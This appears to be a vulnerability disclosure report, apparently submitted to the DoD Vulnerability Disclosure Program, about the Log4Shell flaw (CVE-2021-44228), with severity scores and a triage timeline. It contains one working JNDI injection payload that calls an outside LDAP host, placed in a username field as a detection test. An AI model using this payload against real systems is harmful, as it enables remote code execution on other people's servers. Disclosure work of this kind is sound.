10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
0.976 High
EPSS
Percentile
100.0%
#Report
Description:
https://vulners.com/cve/CVE-2021-44228
Probably arbitrary code execution
███████
CVE-2021-44228
${jndi:ldap://dns-server-yoi-control/a}
into the username fieldObserve that a request was made to your DNS server. This strongly suggests a vulnerable log4j.
Update log4j or disable jndi support.
#Activity Timeline
2021-12-10 18:16 (-0600) (comment)
Greetings from the Department of Defense (DoD),
Thank you for supporting the DoD Vulnerability Disclosure Program (VDP).
By submitting this report, you acknowledge understanding of, and agreement to, the DoD Vulnerability Disclosure Policy as detailed at @DeptofDefense.
The VDP Team will review your report to ensure compliance with the DoD Vulnerability Disclosure Policy. If your report is determined to be out-of-scope, it will be closed without action.
We will attempt to validate in-scope vulnerability reports and may request additional information from you if necessary. We will forward reports with validated vulnerabilities to DoD system owners for their action.
Our goal is to provide you with status updates not less than every two weeks until the reported vulnerability is resolved.
Regards,
The VDP Team
2021-12-13 08:29 (-0600): @agent-l8 (report severity updated)
null
2021-12-13 08:29 (-0600): @agent-l8 (bug triaged)
Greetings,
We have validated the vulnerability you reported and are preparing to forward this report to the affected DoD system owner for resolution.
Thank you for bringing this vulnerability to our attention!
We will endeavor to answer any questions the system owners may have regarding this report; however, there is a possibility we will need to contact you if they require more information to resolve the vulnerability.
You will receive another status update after we have confirmed your report has been resolved by the system owner. If you have any questions, please let me know.
Thanks again for supporting the DoD Vulnerability Disclosure Program.
Regards,
The VDP Team
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
0.976 High
EPSS
Percentile
100.0%